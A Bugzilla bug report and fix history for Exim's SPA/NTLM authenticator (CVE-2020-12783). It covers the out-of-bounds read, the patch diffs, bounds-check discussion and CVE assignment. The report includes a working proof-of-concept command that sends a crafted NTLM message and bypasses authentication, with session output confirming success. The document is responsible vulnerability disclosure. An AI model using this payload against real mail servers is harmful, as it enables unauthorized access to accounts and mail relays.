Bugzilla – Bug 2571
Out-of-bound buffer read leads to Authentication Bypass in Exim SPA authentication method
Last modified: 2022-02-06 15:09:26 UTC
Hi, Exim security team. I am Orange Tsai from DEVCORE security team. We just did a little audit on authentication mechanisms, and found an out-of-bound buffer read in the SPA implementation. In `spa.c`, there is no check on the user-supplied NTLM authentication message. Since NTLM is an encoded structure, an attacker can supply a customized `length` and `offset` to read an arbitrary memory address.

For example: the SPA username/password challenge check is in `spa.c#248`.

https://github.com/Exim/exim/blob/master/src/src/auths/spa.c#L249

Since we control the whole `responseptr`, we can adjust the `offset` to the address of `ntRespData` to bypass this authentication.

Here is the PoC:

```
$ (echo 'EHLO test.org'; echo AUTH NTLM; echo "AAAA"; echo -ne 'o\x00r\x00a\x00n\x00g\x00e\x00\x00BDDCCCCBBGG\x70\x04\x00\x00BBCCCC\x0e\x00\x0e\x00\x0e\x00\x00\x00\x00\x00' | base64 -w0 ; echo ; echo QUIT) | ./exim -bh 127.0.0.1

**** SMTP testing session as if from host 127.0.0.1
**** but without any ident (RFC 1413) callback.
**** This is not for real!

>>> host in hosts_connection_nolog? no (option unset)
>>> host in host_lookup? yes (matched "*")
>>> looking up host name for 127.0.0.1
>>> IP address lookup using gethostbyaddr()
>>> IP address lookup yielded "localhost.localdomain"
>>> alias "localhost"
>>> no IP addresses found for localhost.localdomain
>>> no IP addresses found for localhost
>>> 127.0.0.1 does not match any IP address for localhost.localdomain
>>> host in host_reject_connection? no (option unset)
>>> host in sender_unqualified_hosts? no (option unset)
>>> host in recipient_unqualified_hosts? no (option unset)
>>> host in helo_verify_hosts? no (option unset)
>>> host in helo_try_verify_hosts? no (option unset)
>>> host in helo_accept_junk_hosts? no (option unset)
220 ubuntu ESMTP Exim 4.93 Sun, 03 May 2020 10:25:45 +0800
>>> test.org in helo_lookup_domains? no (end of list)
>>> host in dsn_advertise_hosts? no (option unset)
>>> host in pipelining_advertise_hosts? yes (matched "*")
>>> host in auth_advertise_hosts? yes (matched "*")
>>> host in chunking_advertise_hosts? yes (matched "*")
>>> host in tls_advertise_hosts? yes (matched "*")
250-ubuntu Hello test.org [127.0.0.1]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-AUTH NTLM
250-CHUNKING
250-STARTTLS
250-PRDR
250 HELP
334 NTLM supported
334 TlRMTVNTUAACAAAAAAAAAAAoAAABggAAEDPISlBkLXQAAAAAAAAAAAAAAAAAAAAA
>>> spa authenticator server_condition:
>>>   $auth1 = orange
>>>   $1 = orange
235 Authentication succeeded
221 ubuntu closing connection
```

Our configuration:

```
$ cat /usr/exim/configure
...
spa:
  driver = spa
  public_name = NTLM
  server_password = ${lookup{$auth1}lsearch{/etc/exim/spa_clearpass}{$value}fail}
...
$ cat /etc/exim/spa_clearpass
orange:orange
```
Git commit: https://git.exim.org/exim.git/commitdiff/57aa14b216432be381b6295c312065b2fd034f86

```
commit 57aa14b216432be381b6295c312065b2fd034f86
Author:     Jeremy Harris <jgh146exb@wizmail.org>
AuthorDate: Tue May 5 21:02:14 2020 +0100
Commit:     Jeremy Harris <jgh146exb@wizmail.org>
CommitDate: Tue May 5 21:02:14 2020 +0100

    fix spa authenticator, checking client-supplied data before using it.  bug 2571
----
 doc/doc-txt/ChangeLog    |   5 ++
 src/src/auths/auth-spa.c | 120 +++++++++++++++++++++++------------------------
 src/src/auths/spa.c      |  20 ++++++--
 3 files changed, 82 insertions(+), 63 deletions(-)
```
Hi! The patch just checks that "pointer + offset" is smaller than the end of `responseptr`. However, the check condition is prone to integer overflow. An attacker can cause a crash on a 32-bit system.
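The overflow-prone "pointer + offset" comparison described in the comment above, beside an integer-first bounds check that validates the client-supplied offset and length against the object size before any pointer is formed. This is an added C example, not Exim's code: `struct spa_resp`, its sizes and all function names are constructed stand-ins for illustration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Cut-down stand-in for Exim's SPAAuthResponse (constructed for this
 * example, not the real layout): fixed header fields followed by a byte
 * buffer that client-supplied (offset, length) descriptors index into. */
struct spa_resp {
    uint8_t hdr[32];
    uint8_t buffer[256];
};

/* A zero-filled sample response, constructed so the checks below can be
 * exercised against a real object. */
struct spa_resp sample_resp;

/* The first fix's test, `p + len*2 >= end`, evaluated the way a 32-bit
 * target evaluates it: addresses are modelled as uint32_t so the wrap is
 * explicit instead of undefined pointer arithmetic.  `base` is the address
 * of the struct; `off` and `len` come straight from the client. */
bool first_fix_check_32bit(uint32_t base, uint32_t off, uint16_t len)
{
    uint32_t end  = base + (uint32_t)sizeof(struct spa_resp);
    uint32_t p    = base + off;             /* wraps for a large off     */
    uint32_t last = p + (uint32_t)len * 2;  /* may wrap again            */
    return last < end;                      /* "in bounds" once p < base */
}

/* Reworked check: validate the integers against the object size before
 * forming any pointer, using subtraction so nothing can overflow.
 * `len` counts UTF-16 units as in spa.c, so the byte length is len*2. */
bool field_in_bounds(const struct spa_resp *r, uint32_t off, uint16_t len)
{
    size_t total = sizeof *r;
    if (off >= total) return false;          /* start must lie inside r  */
    return (size_t)len * 2 <= total - off;   /* and the bytes must fit   */
}

/* Returns the field's first byte, or NULL for a bad descriptor; callers
 * never touch `off` without this gate, which is the pattern the fix adopts. */
const uint8_t *spa_field(const struct spa_resp *r, uint32_t off, uint16_t len)
{
    return field_in_bounds(r, off, len) ? (const uint8_t *)r + off : NULL;
}
```

With a struct placed near the top of a 32-bit address space, the first form accepts an offset far beyond the object because the sum wraps below `end`; the integer-first form rejects it regardless of where the struct sits.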
Git commit: https://git.exim.org/exim.git/commitdiff/a04174dc2a84ae1008c23b6a7109e7fa3fb7b8b0 commit a04174dc2a84ae1008c23b6a7109e7fa3fb7b8b0 Author: Jeremy Harris <jgh146exb@wizmail.org> AuthorDate: Wed May 6 22:31:25 2020 +0100 Commit: Jeremy Harris <jgh146exb@wizmail.org> CommitDate: Wed May 6 22:31:25 2020 +0100 Rework SPA fix to avoid overflows. Bug 2571 Amends: 57aa14b216 --- src/src/auths/spa.c | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) diff --git a/src/src/auths/spa.c b/src/src/auths/spa.c index f83d114..ff90d33 100644 --- a/src/src/auths/spa.c +++ b/src/src/auths/spa.c @@ -141,6 +141,7 @@ SPAAuthResponse response; SPAAuthResponse *responseptr = &response; uschar msgbuf[2048]; uschar *clearpass, *s; +unsigned off; /* send a 334, MS Exchange style, and grab the client's request, unless we already have it via an initial response. */ @@ -187,10 +188,13 @@ that causes failure if the size of msgbuf is exceeded. ****/ { int i; - char * p = (CS responseptr) + IVAL(&responseptr->uUser.offset,0); + char * p; int len = SVAL(&responseptr->uUser.len,0)/2; - if (p + len*2 >= CS (responseptr+1)) + if ( (off = IVAL(&responseptr->uUser.offset,0)) >= sizeof(SPAAuthResponse) + || len >= sizeof(responseptr->buffer)/2 + || (p = (CS responseptr) + off) + len*2 >= CS (responseptr+1) + ) { DEBUG(D_auth) debug_printf("auth_spa_server(): bad uUser spec in response\n"); @@ -242,13 +246,14 @@ spa_smb_nt_encrypt(clearpass, challenge.challengeData, ntRespData); /* compare NT hash (LM may not be available) */ -s = (US responseptr) + IVAL(&responseptr->ntResponse.offset,0); -if (s + 24 >= US (responseptr+1)) +off = IVAL(&responseptr->ntResponse.offset,0); +if (off >= sizeof(SPAAuthResponse) - 24) { DEBUG(D_auth) debug_printf("auth_spa_server(): bad ntRespData spec in response\n"); return FAIL; } +s = (US responseptr) + off; if (memcmp(ntRespData, s, 24) == 0) return auth_check_serv_cond(ablock); /* success. we have a winner. */
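Review bot: In the uUser hunk, `len` stays an `int` while the new `off` is `unsigned`, and `len` is compared against `sizeof(responseptr->buffer)/2`, a `size_t`; SVAL yields an unsigned 16-bit value so `len` cannot be negative and the mixed-sign comparison is harmless, but declaring it `unsigned len` alongside `unsigned off` would state that invariant in the code and avoid the sign-compare warning. The ordering of the three conditions is right: `off` and `len` are bounded by the object size before `p` is formed, so the pointer comparison in the last clause can no longer wrap as the earlier `p + len*2 >= CS (responseptr+1)` could.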
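Review bot: In the ntResponse hunk, `off >= sizeof(SPAAuthResponse) - 24` keeps the original `>=`, so an offset whose 24 bytes end exactly on the last byte of the struct is still rejected; that one-byte conservatism is harmless, and `off > sizeof(SPAAuthResponse) - 24` would be the exact bound if it ever matters. The bound is the struct size rather than the number of bytes actually decoded from the client, and the first hunk's context shows `SPAAuthResponse response;` declared with no initializer; unless it is zero-filled in code outside this diff, an offset past the decoded data makes `memcmp` compare `ntRespData` against stale stack bytes, which will not match in practice but is cleaner to rule out with a `memset` before decoding.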
Should this get a CVE?
Hi Andreas, I requested one from MITRE via the cveform.mitre.org (assuming this was not done yet, but have added a comment that it might have been already requested).
The CVE assigned by MITRE is CVE-2020-12783.
Now that there is a CVE, I think it deserves a fixes release for distributions.
Lacking further substantive comment on the fix, closing.